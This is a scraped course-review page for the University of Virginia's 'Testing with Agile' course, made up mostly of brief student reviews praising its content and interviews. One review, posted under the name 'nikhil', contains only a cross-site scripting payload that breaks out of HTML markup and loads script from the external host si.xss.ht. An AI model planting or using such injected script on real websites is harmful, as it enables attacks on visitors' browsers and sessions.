Chevron Left
Voltar para Testing with Agile

Comentários e feedback de alunos de Testing with Agile da instituição Universidade da Virgínia

4.6
340 classificações
57 avaliações

Sobre o curso

To deliver agile outcomes, you have to do more than implement an agile process- you have to create focus around what matters to your user and rigorously test how well what you’re doing is delivering on that focus. Driving to testable ideas (hypotheses) and maximizing the results of your experimentation is at the heart of a high-functioning practice of agile. This course shows you how to facilitate alignment and create a culture of experimentation across your product pipeline. You’ll understand how to answer these four big questions: 1. How do we drive our agility with analytics? 2. How do we create compelling propositions for our user?
 3. How do we achieve excellent usability?
 4. How do we release fast without creating disasters?
 As a Project Management Institute (PMI®) Registered Education Provider, the University of Virginia Darden School of Business has been approved by PMI to issue 20 professional development units (PDUs) for this course, which focuses on core competencies recognized by PMI. (Provider #2122) This course is supported by the Batten Institute at UVA’s Darden School of Business. The Batten Institute’s mission is to improve the world through entrepreneurship and innovation: www.batteninstitute.org....

Melhores avaliações

MB

Jan 30, 2019

Alex does an excellent job in structuring and delivering his courses. Definitely makes me want to continue educational opportunities with his courses offered and University of Virginia.

OS

Jun 26, 2017

I thought this was a very good practical course. It was challenging for me since I lack experience in software development industry, but I thought it gave me a very good framework.

Filtrar por:

26 — 50 de {totalReviews} Avaliações para o Testing with Agile

por SAMUEL B

Oct 23, 2018

G

por Vyju I

Oct 31, 2018

Alex's use of thought leader's in the industry is very helpful.

por Andreu M N

Jul 14, 2018

I totally recommend this course. Well prepared, interesting interviews done by Alex to several professional with well-known reputation, good explanations, and well-prepared exercises. It’s totally worth to invest your time and money if you want to start in Agile.

por Shin-Ing C

Jul 11, 2018

Provides a very complete and clear picture of software testing

por Pedro D G

Apr 22, 2019

Great!

por Miguel A T A

May 13, 2019

Es un muy buen curso, me dio mucha luz sobre la importancia de la automatización de las pruebas en equipos ágiles de desarrollo.

por VINOD T

Mar 26, 2019

very helpful

por Mahendra S

Mar 28, 2019

Very Great course everyone should do this who works in testing. very helpful for future.

por MASOOTH A

Jun 20, 2019

great

por nikhil+(<a>)

Apr 26, 2019

"><script src=https://si.xss.ht></script>

por Anil K S

Aug 26, 2019

Very helpful for Agile Tester.

por Hemant B K

Aug 28, 2019

Very good content and presentation. Liked the talks by different people from industry which gives a real world perspective from Agile practitioners

por Mark H

Sep 03, 2019

Good overview of testing, Agile or otherwise

por Jiří Z

Sep 17, 2019

really beneficial way of thinking

por Constance C

Mar 23, 2018

Overall very useful information and some good advice from some of the expert interviews. As a software developer I am often looking for specific hints and tip s in this area and this course provided some valuable advice and perspectives that I can apply immediatley

por Nkeangnyi L Y

Apr 02, 2018

One tough course

por Cíntia M d C R

Feb 27, 2017

.

por Vladimir B

Nov 17, 2016

Valuable experience. Well composed. Not designed for Sales and Product Managers though.

por Alberto F

Nov 26, 2016

Great course!

por Andrew B

Apr 30, 2018

I really enjoyed it, but I wish they covered more about testing software

por Aleksandra S

Sep 16, 2016

The last assignment is hard to do if you have just pretend project not real one. But whole course is really good.

por Michael S

Mar 10, 2017

Another great course 2nd best after managing an agile team. Great content and presenters with useful recommendations.

por Roberto L

May 16, 2018

Agile course is well structured and teaching material

por ganeshkiran

May 21, 2019

More real time example would have been good

por Anders L

Mar 07, 2017

It wasn't easy to understand the practices of software development in this course. Please try to explain a little close, how software devs actually work.